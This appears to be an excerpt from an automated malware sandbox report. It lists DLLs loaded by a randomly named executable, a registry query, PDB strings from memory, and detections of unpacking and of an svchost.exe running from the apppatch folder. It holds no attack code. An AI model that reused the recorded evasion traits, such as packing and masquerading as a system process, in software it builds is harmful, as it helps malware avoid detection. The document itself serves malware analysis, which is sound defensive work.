Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\WlCVLbzNph.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
Source: WlCVLbzNph.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2700878019.0000000007C3B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPtwtzGyOdAtB.exe, 00000005.00000002.1934683866.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000002.1935101220.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1817445370.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000D.00000002.1935586278.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000F.00000000.1852775945.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1881079746.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000016.00000000.1879737054.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000019.00000000.1898777983.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001C.00000002.1914742299.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001E.00000002.2019539381.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000020.00000002.2050100961.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000023.00000002.2052551913.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989138523.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000003.2567509191.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\WlCVLbzNph.exeUnpacked PE file: 0.2.WlCVLbzNph.exe.400000.1.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeUnpacked PE file: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack
